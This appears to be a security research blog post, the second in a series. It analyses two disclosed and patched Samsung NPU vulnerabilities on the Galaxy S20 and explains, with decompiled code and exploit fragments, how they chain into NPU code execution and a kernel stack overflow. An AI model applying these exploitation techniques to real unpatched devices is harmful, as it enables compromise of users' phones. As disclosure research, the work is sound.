impalabs space base graphics
Reversing and Exploiting Samsung's NPU (Part 2)

This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.

After an in-depth analysis of the NPU OS and its interaction with the Android kernel, this second part gives a more offensive outlook on this component. We will go through the main attack vectors to target it and detail two vulnerabilities that can be chained together to get code execution in the NPU from the NPU driver before pivoting back into the kernel.

This article is the second part in a series about reversing and exploiting Samsung's Neural Processing Unit. NPUs are generally used to provide dedicated computing power for machine learning and AI-related algorithms. While it could make for an interesting article, if you've read the first part, you know that our primary interest is rather the underlying custom OS Samsung has implemented for its NPU.

Part 1 focused on reverse engineering almost exhaustively what could be considered the kernel of the NPU OS, i.e. all the subsystems related to memory allocation, task scheduling, event handling, etc. While reading it is encouraged to understand this second part, it's not a prerequisite. We will try to provide the necessary context along the way so that you can still follow easily.

In this second part, we will detail two vulnerabilities that were identified while reverse engineering the NPU OS. We will also explain how an exploit can be constructed to trigger a buffer overflow in the Android kernel from a user able to access the NPU driver.

Regarding the disclosure process, these issues have been reported to Samsung and have been patched in their May and June security bulletins under the identifiers SVE-2021-20204 and SVE-2021-21074. The exploits used in this article are tailored for the Samsung Galaxy S20 SM-G980F running the unpatched firmware G980FXXS5CTL5 from January 2021.

Now that we are done with the introduction, let's move on to the analysis of the first vulnerability identified: a limited write to an arbitrary address in the NPU's address space.

Limited Arbitrary Write in the Neural Processing Unit

Communication Between the NPU and the Kernel

As we have explained previously, the NPU is a dedicated chip running its own firmware independently from the Android kernel. In simplified terms, the NPU is a blackbox providing an API that can be queried from the kernel. Inputs are sent to it, ML algorithms do their magic, and the results are sent back.

In the first part of this series, in the section called Interacting with the NPU, we explained how the NPU and the kernel communicate using a system of shared memory and mailboxes. In a nutshell, the kernel starts off by mapping the NPU's shared memory regions using init_iomem_area. It then creates a request for the NPU and writes into the mailbox by calling npu_session_put_nw_req. Once the message is ready to be sent, an interrupt is triggered and the NPU is notified that a new request is waiting in its low priority mailbox.

The task responsible for the low priority mailbox parses the message using mbx_dnward_get and calls the corresponding command handler in mbx_msghub_req. The 9 command handlers implemented in the NPU are defined in init_ncp_handlers.

void init_ncp_handlers(struct ncp_handler_state_t *ncp_handler_state) {
    ncp_handler_state->_unk_0x364 = 4;

    /* Resets messages state */
    for (int i = 0; i < NB_MESSAGES; i++) {
        ncp_handler_state->messages[i].state = RESPONSE_FREE;

    /* Initializes the handlers for the request commands */
    ncp_handler_state->handlers[0] = ncp_manager_load;
    ncp_handler_state->handlers[1] = ncp_manager_unload;
    ncp_handler_state->handlers[2] = ncp_manager_process;
    ncp_handler_state->handlers[3] = profile_control;
    ncp_handler_state->handlers[4] = ncp_manager_purge;
    ncp_handler_state->handlers[5] = ncp_manager_powerdown;
    ncp_handler_state->handlers[6] = ut_main_func;
    ncp_handler_state->handlers[7] = ncp_manager_policy;
    ncp_handler_state->handlers[8] = ncp_manager_end;

While pretty succinct, this explanation should give you a rough understanding of where our data are coming from and how to map a request type in the kernel to a command handler in the NPU (e.g. COMMAND_FW_TEST and ut_main_func).

These handlers are the most obvious entry points into the NPU and targets of choice when it comes to vulnerability research. The next section presents a bug in one of those handlers, namely ncp_manager_load.

Vulnerability Details

To perform its tasks, the NPU relies on a system of objects called ncp_object which are filled with inputs sent by the kernel. They are identified by a number and are persistent across requests so that you can perform multiple operations on them if needed. Regarding the type of action that you can do, as the names of the command handlers suggests, it's possible to perform operations such as loading, unloading or processing an object. In our case, we will be looking at the loading process implemented in ncp_manager_load.

Information sent from the kernel are initially parsed as a struct message, which specifies the command handler ID, the data to process and its length.

struct message {
    u32 magic;
    u32 mid;
    u32 command;
    u32 length;
    u32 self;
    u32 data;

The field data points to another structure, namely struct command, and will be passed to the command handlers. The NPU will then be able to retrieve the payload to process as well as other information related to the request in the union c (e.g. object ID, task ID, etc.):

struct command {
    union {
        struct cmd_load     load;
        struct cmd_unload   unload;
        struct cmd_process  process;
        struct cmd_profile_ctl  profile_ctl;
        struct cmd_fw_test  fw_test;
        struct cmd_purge    purge;
        struct cmd_powerdown    powerdown;
        struct cmd_done     done;
        struct cmd_ndone    ndone;
        struct cmd_group_done   gdone;
    } c; /* specific command properties */

    u32 length; /* the size of payload */
    u32 payload;

As can be seen in the code snippet below, after performing some sanity checks on the input values, ncp_manager_load calls an initialization handler from g_ncp_object_state.callbacks. If the object we're trying to use is free, the callback used will be ncp_object_load to which we pass the NCP object as well as the initial pointer on the command structure from the kernel.

int ncp_manager_load(struct command **cmd_p) {
    int ret;
    struct ncp_object *obj;

    /* Checks if the object ID is not out of bounds */
    if (cmd->c.load.oid >= 8) {
    ret = 0x106;

    /* Checks if the task ID is valid and not out of bounds */
    if (cmd->c.load.tid >= 2 && cmd->c.load.tid != -1) {
        ret = 0x108;

    obj = g_ncp_object_state.objects[cmd->c.load.oid]

    /* Irrelevant object setup */

    /* [...] */

     * Calls the corresponding initialisation callbacks
     * Depending on the current state of the object, one of those callbacks
     * could be something like ncp_object_load, ncp_object_process, or 
     * ncp_object_invalid if we're trying to perform an invalid operation.
     * In any case, when using an object for the first time, assuming
     * memory wasn't tampered with, the function called will be
     * ncp_object_load.
    (*g_ncp_object_state.callbacks[obj->state * 2])(obj, cmd_p);

     * The rest of the function is not really relevant since it won't
     * interfere with our exploit once the vulnerable function in
     * ncp_object_load returns.

    /* [...] */

ncp_object_load checks that the payload and the length are not empty and, if that's the case, it calls parser_init with a pointer to a field in the ncp_object, the payload address and its length.

    int ncp_object_load(struct ncp_object *obj, struct command **cmd_p) {
        int ret;
        struct command *cmd = *cmd_p;

        /* Checks the payload pointer */
        if (cmd->payload) {
            /* Checks the payload length */
            if (cmd->length) {
                /* Parses the payload to fill the NCP object */
                ret = parser_init(
                    &obj->ncp_object_copy_ptr, cmd->payload, cmd->length);

                /* [...] */

        * The rest of the function is not really relevant and won't
        * interfere with our exploit.

        /* [...] */

The role of parser_init is central to the loading process: it is responsible for parsing the kernel data stored in cmd->payload and copying them into the corresponding NCP object.

cmd->payload is comprised of a header which references data placed after it. This header is a ncp_header structure and is given below.

/* ncp_header structure used as header for the payload */
struct ncp_header {
    u32 magic_number1;
    u32 hdr_version;
    u32 hdr_size;
    u32 intrinsic_version;
    u32 net_id;
    u32 unique_id;
    u32 priority;
    u32 flags;
    u32 period;
    u32 workload;
    u32 address_vector_offset;
    u32 address_vector_cnt;
    u32 memory_vector_offset;
    u32 memory_vector_cnt;
    u32 group_vector_offset;
    u32 group_vector_cnt;
    u32 body_version;
    u32 body_offset;
    u32 body_size;
    u32 io_vector_offset;
    u32 io_vector_cnt;
    u32 reserved[10];
    u32 magic_number2;

parser_init starts off by performing sanity checks on the header fields to make sure the kernel did not send an invalid or incompatible payload.

int parser_init(struct ncp_object *ncp_object, ncp_header *payload, int length) {
    /* Checks the first magic number at the beginning of the structure */
    if (payload->magic_number1 != 0xC0FFEE0)
    return 0x10D;

    /* Checks the second magic number at the end of the structure */
    if (payload->magic_number2 != 0xC0DEC0DE)
    return 0x10E;

     * Makes sure the header version used by the kernel is the same as
     * the NPU.
    if (payload->hdr_version != 0x16)
        return 0x10F;

     * Makes sure the intrinsic API version used by the kernel is the same 
     * as the NPU.
    if (payload->intrinsic_version < 0x15)
        return 0x10F;

    /* Makes sure the payload does not extend outside the heap */
    u32 header_size = length - 0x7C * payload->io_vector_cnt;
    if (header_size >= 0x60000)
        return 0x10B;

    /* [...] */

It then allocates memory for the new NCP object and starts copying data into it.

int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {
     * Allocates memory to get a copy of the header from the kernel into
     * the NPU
    struct ncp_header* ncp_header = (ncp_header *)malloc(header_size);
    if ( !ncp_header )
        return 0x10C;

    /* Copies the header from the payload */
    memcpy(ncp_header, payload, header_size);

    /* NCP object setup ------------------------------------------------ */
    /* Addresses relative to ncp_header */
    ncp_object->ncp_cpy.buffer = ncp_header;
    ncp_object->ncp_cpy.address_vector = \
        ncp_header + ncp_header->address_vector_offset;
    ncp_object->ncp_cpy.memory_vector = \
        ncp_header + ncp_header->memory_vector_offset;
    ncp_object->ncp_cpy.io_vector = \
        ncp_header + ncp_header->io_vector_offset;
    ncp_object->ncp_cpy.group_vector = \
        ncp_header + ncp_header->group_vector_offset;
    ncp_object->ncp_cpy.chunks = ncp_object->chunks;
    ncp_object->ncp_cpy.body = ncp_header + ncp_header->body_offset;

    /* Addresses relative to the payload */
    ncp_object->ncp_src.buffer = payload;
    ncp_object->ncp_src.address_vector = \
        payload + ncp_header->address_vector_offset;
    ncp_object->ncp_src.memory_vector = \
        payload + ncp_header->memory_vector_offset;
    ncp_object->ncp_src.io_vector = \
        payload + ncp_header->io_vector_offset;
    ncp_object->ncp_src.group_vector = \
        payload + ncp_header->group_vector_offset;
    ncp_object->ncp_src.chunks = ncp_object->chunks;
    ncp_object->ncp_src.body = payload + ncp_header->body_offset;

    ncp_object->_unk_48 = 0;
    ncp_object->vector_cnt = ncp_header->group_vector_cnt;
    ncp_object->_unk_54 = 0;
    ncp_object->chunk_cnt = 0;
    ncp_object->header = ncp_header;
    /* ----------------------------------------------------------------- */

    /* [...] */

As you can see, some addresses are computed using an offset provided in the payload. While some of those are verified in the kernel, others are left unchecked. In particular, the field group_vector_offset is used as an offset to retrieve an array of group vectors. A rough decompiled version of the code parsing the group vectors is given below.

int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {

     * Computes the group_vector address using the user-controlled
     * value `group_vector_offset` from the ncp header.
    struct group_vector *curr_group_vector;
    struct group_vector *group_vectors = \
        ncp_header + ncp_header->group_vector_offset;

    /* [...] */

    u32 vector_ctr = 0;

    /* If there are vectors to parse... */
    if (ncp_object->vector_cnt) {
        while (1) {
             * Retrieves the offset and size of the current group vector
             * at offsets 0x18 and 0x1c respectively.
            u32 intrinsic_offset = group_vectors->intrinsic_offset;
            u32 intrinsic_size = group_vectors->intrinsic_size;
            /* The intrinsic offset must be 4-byte aligned */
            if (intrinsic_offset & 3)
                return 0x115;

            struct ncp_chunk* chunk = ncp_object->chunks[chunk_id];
            if (0x7800 - chunk->_unk_08 < intrinsic_size) {
                /* Marks the current group vector as processed */
                if (curr_group_vector) {
                    curr_group_vector->flags |= 8;
                    /* [...] */

            /* [...] */

            /* Moves on to the next group vector */
            curr_group_vector = group_vectors;

            /* If there is no more group vector to parse */
            if (vector_ctr >= ncp_object->vector_cnt)
                goto GROUP_VECTOR_SUCCESS;

    /* [...] */

    /* Marks the last group vector as processed */
    if (curr_group_vector) {
        group_vector->flags |= 8;
        /* [...] */

Once parser_init has looped over all group vectors successfully, the 4th bit of group_vector->flags will be set for each of them to signify that they are valid. However, since the address of all group_vector objects are relative to ncp_header->group_vector_offset, which is user-controlled, it is possible to set the 4th bit of arbitrary bytes in the address space of the NPU. The only limitation is that the value coinciding with group_vectors->intrinsic_offset must be 4-byte aligned. The next section explains how this primitive can be exploited to get arbitrary code execution in the NPU.


SELinux Context

Before we can start, we need to take a look at the SELinux context to list which components are able to communicate with the NPU.

The SELinux context of Samsung's NPU device driver /dev/vertex10 used to be untrusted_app. However, as can be seen below, it was made more restrictive after Project Zero's disclosure of vulnerabilities affecting this driver.

x1s:/dev # ls -lZ /dev/vertex10
crw-r--r-- 1 system system u:object_r:vendor_npu_device:s0  82,  10 2021-03-16 12:16 /dev/vertex10

This means that in order to communicate with it, we would need a first privilege escalation to get access to the vendor_npu_device SELinux context. On the firmware we analyzed, we can see that there are five contexts able to send ioctls to the NPU driver:

  • hal_camera_default
  • hal_neuralnetworks_eden_drv_default
  • hal_vendor_eden_runtime_default
  • platform_app
  • snap_hidl
lyte@debian:~/tmp$ sesearch --allow s20_selinux_policy | grep vendor_npu_device | grep ioctl
allow hal_camera_default vendor_npu_device:chr_file { ioctl open read write };
allow hal_neuralnetworks_eden_drv_default vendor_npu_device:chr_file { ioctl open read write };
allow hal_vendor_eden_runtime_default vendor_npu_device:chr_file { ioctl open read write };
allow platform_app vendor_npu_device:chr_file { ioctl open read };
allow snap_hidl vendor_npu_device:chr_file { append getattr ioctl lock map open read watch watch_reads write };

And as far as we can tell, this could be achieved by compromising one of the following processes:

x1s:/dev # ps -ZA | grep -e hal_camera_default -e hal_neuralnetworks_eden_drv_default -e hal_vendor_eden_runtime_default -e platform_app -e snap_hidl
u:r:hal_neuralnetworks_eden_drv_default:s0 system 6104  1 11310600 14172 binder_ioctl_write_read 0 S android.hardware.neuralnetworks@1.3-service.eden-drv
u:r:hal_camera_default:s0      cameraserver   6125      1 10958168 11580 binder_ioctl_write_read 0 S
u:r:snap_hidl:s0               system         6132      1 10801344  3728 binder_ioctl_write_read 0 S
u:r:hal_vendor_eden_runtime_default:s0 system 6179      1 11305928 14196 binder_ioctl_write_read 0 S vendor.samsung_slsi.hardware.eden_runtime@1.0-service
u:r:platform_app:s0:c512,c768  u0_a62         6982   6077 16114388 346668 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a151        7532   6077 14853708 226100 ep_poll            0 S
u:r:platform_app:s0:c512,c768  oem_5013       7777   6077 14127536 125892 ep_poll            0 S com.sec.location.nsflp2
u:r:platform_app:s0:c512,c768  u0_a124        8517   6077 14024140 107888 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a213        9226   6077 14832340 147584 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_cmhservice 10115 6077 15057436 135868 ep_poll          0 S
u:r:platform_app:s0:c512,c768  u0_a73        11551   6077 14605848 141736 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_bcmgr  13858   6077 14002784 107068 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a116       16417   6077 14578312 144200 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a230       22542   6077 14119200 136896 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a120       27008   6079 2022612 131968 ep_poll             0 S
u:r:platform_app:s0:c512,c768  u0_a118       27056   6077 14688588 162236 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_cmhservice 28417 6077 14074464 127488 ep_poll          0 S
u:r:platform_app:s0:c512,c768  u0_a183       29598   6079 1993840 101000 ep_poll             0 S
u:r:platform_app:s0:c512,c768  u0_a132       29637   6077 14153028 140804 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a62        29683   6077 14072516 139300 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a62        29701   6077 14577548 142168 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a116       29743   6077 14596868 145088 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a140       29751   6077 14548660 120172 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_sharelive 29784 6077 14185152 140744 ep_poll           0 S
u:r:platform_app:s0:c512,c768  u0_a99        30118   6079 1461684 109072 ep_poll             0 S
u:r:platform_app:s0:c512,c768  u0_a89        30155   6077 14116800 137956 ep_poll            0 S
u:r:platform_app:s0:c512,c768  u0_a93        30174   6077 14857764 150664 ep_poll            0 S
u:r:platform_app:s0:c512,c768  vendor_cmhservice 32195 6077 14684604 163392 ep_poll          0 S

Getting access to one of these processes is not the goal of this article and we will assume that we're already running in a SELinux context allowed to send ioclts to /dev/vertex10.

General Strategy

Writing an exploit for this vulnerability was relatively straightforward, partly because there are few security mitigations used in the NPU. As we can see in the table below, multiple writable sections are not marked as non-executable and, during the initialization of the NPU, the WXN bit is not set in SCTLR. It means that if we are somehow able to inject a shellcode into one of the RWX section and redirect the execution flow to it, we could take control of the NPU.

Type Virtual Address Physical Address Size PXN XN NS AP B C S
Short Desc. 0x00000000 0x50000000 0x0001d000 N N N Writes at PL0 generate Permission faults Y Y N
Short Desc. 0x0001d000 0x5001d000 0x00003000 N N N Writes at PL0 generate Permission faults Y Y N
Short Desc. 0x00020000 0x50020000 0x0000c000 N N N Writes at PL0 generate Permission faults Y Y N
Short Desc. 0x0002c000 0x5002c000 0x00004000 N N N Writes at PL0 generate Permission faults Y Y N
Short Desc. 0x00030000 0x50030000 0x00001000 N N N Writes at PL0 generate Permission faults Y Y N
Short Desc. 0x00031000 0x50031000 0x00002800 N N N Full access Y Y N
Short Desc. 0x00033800 0x50033800 0x00001000 N N N Full access Y Y N
Short Desc. 0x00034800 0x50034800 0x00001000 N N N Full access Y Y N
Short Desc. 0x00035800 0x50035800 0x00001000 N N N Full access Y Y N
Short Desc. 0x00036800 0x50036800 0x00001000 N N N Full access Y Y N
Short Desc. 0x00037800 0x50037800 0x00005000 N N N Full access Y Y N
Short Desc. 0x0003c800 0x5003c800 0x0002b800 N N N Full access Y Y N
Short Desc. 0x00068000 0x50068000 0x00018000 N N N Full access N N N
Short Desc. 0x00080000 0x50080000 0x00060000 N N N Full access Y Y N

As you can imagine, we will be using our bit-setting primitive to alter the execution flow. The only questions that remains are:

  • How can we inject a shellcode into one of the RWX sections?
  • Which value(s) should be altered to redirect the execution to our shellcode?

The answer to the first question is relatively easy. In parser_init, the payload received by the NPU is copied into a buffer allocated using malloc and therefore residing on the heap, which spans the executable region 0x80000-0xe0000. We can place our shellcode at the end of the payload and execute it from the version copied on the heap.

The solution we chose for the second issue was to modify one bit of a function pointer to make it point to our shellcode. Potential candidates for this step include the handlers defined in init_ncp_handlers which were highlighted at the beginning of this article.

All of these handlers are located in the first code section 0x0-0x1d000. What's convenient here, is that setting the 4th bit in the 2nd byte of a dword will transform an address in the code section, like 0x14abc, into 0x80000 | 0x14abc = 0x94abc, which is now on the heap!

For our exploit, we picked the function pointer of ncp_manager_purge which initially pointed to 0x14C48 and changed it to 0x94C48. Since the payload we send from the kernel can be arbitrarily long (at least long enough to control the area around 0x94C48), afterwards we just need to insert our shellcode at the correct offset and call ncp_manager_purge from the kernel to make the NPU execute our arbitrary instructions. In the next section, we will list the relevant steps to write an exploit and make this possible.

Writing an Exploit

The exploit we developed for this vulnerability is available here. It first starts by allocating and mapping an ION buffer before opening the NPU driver /dev/vertex10.

It then loads the payload we want to execute from "/data/local/tmp/payload.bin". In the Makefile we provide, the payload is compiled from this file and will output a simple "PATCHED_NPU: hello from the NPU!" in dmesg.

The actual exploitation starts with the call to exploit_parser_init_arb_write, which is going to set group_vector_offset to the following out-of-bounds value: NPU_SHUTDOWN_OFFSET + NPU_SHUTDOWN_BYTE_POS - NEXT_MALLOC_ADDR.

  • NPU_SHUTDOWN_OFFSET is the offset of ncp_manager_purge's function pointer.
  • NPU_SHUTDOWN_BYTE_POS is the position of the second byte which also takes into account the offset induced by the flags field in the group_vector object.
  • NEXT_MALLOC_ADDR is the address returned by malloc when it allocates a chunk for the ncp_header copy in parser_init. This value was determined by simply patching the NPU and reading it dynamically (which is possible because there is no signature verification for this binary).

This will place the flags field of our group_vector object over our targeted byte to change the underlying address from 0x14C48 to 0x94C48. exploit_parser_init_arb_write also calls init_ncp_header which copies the custom payload in the ION buffer that will be sent to the kernel and, ultimately, to the NPU. The rest of the values set in the header are mostly irrelevant and won't be explained in this article.

At this stage, all that remains is to send the data to the NPU. This is achieved by first using the ioctl VS4L_VERTEXIOC_S_GRAPH and then VS4L_VERTEXIOC_S_FORMAT. In the exploit, this logic is implemented in the function do_graph_format_ioctl. VS4L_VERTEXIOC_S_FORMAT will trigger a call to npu_session_NW_CMD_LOAD, which executes ncp_manager_load in the NPU and thus our vulnerable function parser_init that uses our out-of-bounds group_vector_offset. Once this ioctl returns, the NPU will have modified the function pointer of its ncp_manager_purge handler. All that is left to do is to call it.

Although, before we can proceed, we will have to meet a few requirements. COMMAND_PURGE is sent to the NPU when performing a STREAMOFF operation. But to call VS4L_VERTEXIOC_STREAM_OFF, we first need to call VS4L_VERTEXIOC_STREAM_ON, and being able to call VS4L_VERTEXIOC_STREAM_ON requires the driver's inqueue and outqueue to be properly configured.

The operations needed to configure these queues are implemented in the functions setup_in_queue and setup_out_queue. They simply send valid requests that specify the directions VS4L_DIRECTION_IN and VS4L_DIRECTION_OUT.

We can now call trigger to make a VS4L_VERTEXIOC_STREAM_ON ioctl followed by a VS4L_VERTEXIOC_STREAM_OFF. If everything went as expected, these calls should succeed and the message "PATCHED_NPU: hello from the NPU!" should appear in dmesg.

If you have an unpatched Samsung Galaxy S20, you can try the exploit by first compiling it using the Android NDK and the Makefile provided.

$ make build
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
    -Tsymbols.ld -fPIC --target=arm-none-eabi -march=armv7a -nostdlib \
    -fpie -ffreestanding -ffunction-sections  -fomit-frame-pointer -o \
    payload.bin payload.c
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android-objcopy \
    -O binary --strip-all payload.bin
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
    -o parser_init parser_init.c

You can then push it on a device and run it.

$ make push
// [...]

$ make run
// [...]
adb wait-for-device shell \
        su root sh -c "/data/local/tmp/parser_init /data/local/tmp/"
[+] Opening /dev/ion
[+] ION allocation
[+] ION buffer mapping
[+] Opening /dev/vertex10
[+] Loading the payload

The following message should appear in dmesg -w:

x1s:/ # dmesg -w | grep "PATCHED_NPU"
[ 5454.496319] [__LOW][0005449.475]PATCHED_NPU: hello from the NPU!

We finally have code execution in the NPU! Now we can have a look at the second vulnerability we identified, which can be leveraged to attack the kernel from the NPU.

Buffer Overflow in Samsung NPU Driver

NPU Mailboxes

In this section, we will give a quick recap on how these mailboxes work. If you want more details, you can head over to the first part of this series. As we have said before, the NPU and the kernel exchange data using a system of mailboxes implemented over shared memory. There are four mailboxes organized according to the format given below:

mailbox layout

A header is used to keep track of the different read/write pointers into the ring buffers. It is defined using the structure struct mailbox_hdr:

struct mailbox_hdr {
    u32 max_slot;
    u32 debug_time;
    u32 debug_code;
    u32 log_level;
    u32 log_dram;
    u32 reserved[8];
    struct mailbox_ctrl h2fctrl[MAILBOX_H2FCTRL_MAX];
    struct mailbox_ctrl f2hctrl[MAILBOX_F2HCTRL_MAX];
    u32 totsize;
    u32 version;
    u32 signature2;
    u32 signature1;

When a message arrives or a response is sent, the read/write pointers stored in the mailbox_ctrl structures are updated to reflect the new positions of the cursor inside the ring buffers.

struct mailbox_ctrl {
    u32 sgmt_ofs;
    u32 sgmt_len;
    u32 wptr;
    u32 rptr;

An illustration of this process is given below:

mailbox ring buffers

Keep in mind that all values in the mailboxes and the header are shared and can be changed by either the NPU or the Android kernel. As you might expect, this can lead to bugs if one side trusts the other a bit too much, as we will see in the next section.

Vulnerability Details

For this vulnerability, we will be taking a look at the functions retrieving the output of a NPU request. When the NPU is done handling a command, it will write back the result into the response mailbox f2hctrl[0]. Once the result is received, the function nw_rslt_manager is called.

int nw_rslt_manager(int *ret_msgid, struct npu_nw *nw)
    int ret;
    struct message msg;
    struct command cmd;

    /* [...] */

    ret = mbx_ipc_get_cmd((void *)interface.addr, &interface.mbox_hdr->f2hctrl[0], &msg, &cmd);

    /* [...] */

nw_rslt_manager then calls mbx_ipc_get_cmd with the argument &interface.mbox_hdr->f2hctrl[0], where interface.mbox_hdr points to the shared mailbox header.
This function reads the content of the mailbox header, before copying the result of the NPU request into cmd using __copy_command_from_line.

int mbx_ipc_get_cmd(char *underlay, volatile struct mailbox_ctrl *ctrl, struct message *msg, struct command *cmd)
    /* [...] */

    /* Reads the values stored in the mailbox header */
    base = underlay - ctrl->sgmt_ofs;
    sgmt_len = ctrl->sgmt_len;
    rptr = ctrl->rptr;
    wptr = ctrl->wptr;

    /* Checks if the readable size in the buffer is bigger than the message size */
    readable_size = __get_readable_size(sgmt_len, wptr, rptr); /* ==> wptr - rptr */
    if (readable_size < msg->length) {
        ret = -EINVAL;
        goto p_err;

    /* Copies the result from the mailbox into `cmd` */
    updated_rptr = __copy_command_from_line(base, sgmt_len, msg->data, cmd, msg->length);

    ctrl->rptr = updated_rptr;

    return ret;

static inline u32 __copy_command_from_line(char *base, u32 sgmt_len, u32 rptr, void *cmd, u32 cmd_size)
    /* need to reimplement accroding to user environment */
    memcpy(cmd, base + LINE_TO_SGMT(sgmt_len, rptr), cmd_size);
    return rptr + cmd_size;

The only check performed is verifying that the readable size in the buffer (i.e. the difference between the read/write pointer) is bigger than the message size. Afterwards, it copies the result from the mailbox buffer into the cmd which is a variable defined on the stack in nw_rslt_manager.

However, since we have code execution in the NPU, we will be able to modify the read/write pointer values as well as the size of the incoming message. We could specify, for example, a message with a length of 0x1000 bytes and set the read/write pointers in a such a way that the resulting readable size is 0x1100. It would pass the condition on the size, but still write 0x1000 bytes in the 0x10-byte long cmd structure, leading to a buffer overflow once nw_rslt_manager returns.


The exploit for this vulnerability is built upon the previous one, with the only addition being a different payload available here. With full control over the NPU, the idea is to write a payload that will modify the mailbox header and forge an outgoing response to the kernel.

The steps to exploit this vulnerability are as follows:

  • First, we need to pick an arbitrary offset into the response mailbox for our crafted message. In the exploit we took 0x60. We can then compute the corresponding address using the beginning of the mailbox region MAILBOX_START and the segment offset of the response mailbox mailbox_hdr->f2hctrl[0].sgmt_ofs.
#define MAILBOX_START 0x80000

struct message *message = \
    MAILBOX_START - mailbox_hdr->f2hctrl[0].sgmt_ofs + CRAFTED_MESSAGE_OFFSET;
  • Then, we forge the message we want the kernel to receive and specify a size of 0x100, which will overflow the capacity of the 0x10-byte cmd kernel structure where the response will be stored.
#define MESSAGE_SIZE 0x100

message->magic = MESSAGE_MAGIC;
message->mid = 0;
message->command = COMMAND_DONE;
message->length = MESSAGE_SIZE; /* Size that will overflow the command in the kernel */
message->self = 0x0;
message->data = CRAFTED_MESSAGE_OFFSET + sizeof(struct message); /* The payload is located right after the message */
  • Finally, we update the read and write pointers in the mailbox header, in order to get a difference larger than MESSAGE_SIZE.
/* Write pointer: points to the end of the crafted message + 0x100 bytes */
mailbox_hdr->f2hctrl[0].wptr = \
    CRAFTED_MESSAGE_OFFSET + sizeof(struct message) + 0x100;

/* Read pointer: points to the beginning of the crafted message */
mailbox_hdr->f2hctrl[0].rptr = CRAFTED_MESSAGE_OFFSET;

At this point, our message is ready to be processed by the kernel. After our payload has been executed by the NPU, it will return gracefully to the command handling function and, along the way, will send an interrupt to the kernel notifying it that a response was received. The kernel will parse it, memcpy will copy the payload of size MESSAGE_SIZE into cmd and when nw_rslt_manager returns, the buffer overflow will trigger.

If you have an unpatched Samsung Galaxy S20 and want to test this exploit, you can try it by first compiling it using the Android NDK and the Makefile provided.

$ make build
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
    -Tsymbols.ld -fPIC --target=arm-none-eabi -march=armv7a -nostdlib \
    -fpie -ffreestanding -ffunction-sections  -fomit-frame-pointer -o \
    payload.bin payload.c
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android-objcopy \
    -O binary --strip-all payload.bin
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
    -o parser_init parser_init.c

You can then push it on a device and run it.

$ make push
// [...]

$ make run
// [...]
adb wait-for-device shell \
        su root sh -c "/data/local/tmp/parser_init /data/local/tmp/"
[+] Opening /dev/ion
[+] ION allocation
[+] ION buffer mapping
[+] Opening /dev/vertex10
[+] Loading the payload

The phone should reboot and the following message should be found in /proc/last_kmsg.

$ adb shell su root sh -c "cat /proc/last_kmsg" | grep -A20 "Kernel panic"
<0>[ 7717.705033]  [2:  npu-proto_AST:23209] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: nw_rslt_manager+0x2e0/0x2e4
<0>[ 7717.705053]  [2:  npu-proto_AST:23209] [Exynos][WDT][ EMERG]: watchdog reset is started to 30secs
<6>[ 7717.705075]  [2:  npu-proto_AST:23209] [Exynos][WDT][  INFO]: TEMP: disable wdt keepalive
<6>[ 7717.705096]  [2:  npu-proto_AST:23209] [Exynos][WDT][  INFO]: Watchdog cluster 0 stop done, WTCON = 115c18
<6>[ 7717.705120]  [2:  npu-proto_AST:23209] [Exynos][WDT][  INFO]: s3c2410wdt_multistage_wdt_start: count=0x0000b32b, wtcon=00115c3c
<6>[ 7717.705135]  [2:  npu-proto_AST:23209] [Exynos][WDT][  INFO]: Watchdog cluster 0 start, WTCON = 115c39
<4>[ 7717.705147]  [2:  npu-proto_AST:23209] secdbg_wdd_set_start: wdd_info->init_done: true
<6>[ 7717.705162]  [2:  npu-proto_AST:23209] debug-snapshot: item - log_kevents is disabled
<3>[ 7717.705187]  [2:  npu-proto_AST:23209] mif: s5100_send_panic_noti_ext: Send CMD_KERNEL_PANIC message to CP
<3>[ 7717.705202]  [2:  npu-proto_AST:23209] mif: pcie_send_ap2cp_irq: Reserve doorbell interrupt: PCI not powered on
<6>[ 7717.705244]  [2:  npu-proto_AST:23209] mif: mif_gpio_set_value: SET GPIO AP2CP_WAKE_UP = 1 (wait 0ms, dup 0)
<4>[ 7717.707221]  [2:  npu-proto_AST:23209] CPU: 2 PID: 23209 Comm: npu-proto_AST FTT: 0 0 Tainted: G S      W         4.19.87 #1
<4>[ 7717.707235]  [2:  npu-proto_AST:23209] Hardware name: Samsung X1SLTE EUR OPEN 21 based on EXYNOS990 (DT)
<4>[ 7717.707246]  [2:  npu-proto_AST:23209] Call trace:
<4>[ 7717.707263]  [2:  npu-proto_AST:23209]  dump_backtrace+0x0/0x1b0
<4>[ 7717.707281]  [2:  npu-proto_AST:23209]  show_stack+0x14/0x20
<4>[ 7717.707296]  [2:  npu-proto_AST:23209]  dump_stack+0xd4/0x110
<4>[ 7717.707311]  [2:  npu-proto_AST:23209]  panic+0x174/0x2dc
<4>[ 7717.707328]  [2:  npu-proto_AST:23209]  __stack_chk_fail+0x18/0x1c
<4>[ 7717.707343]  [2:  npu-proto_AST:23209]  nw_rslt_manager+0x2e0/0x2e4
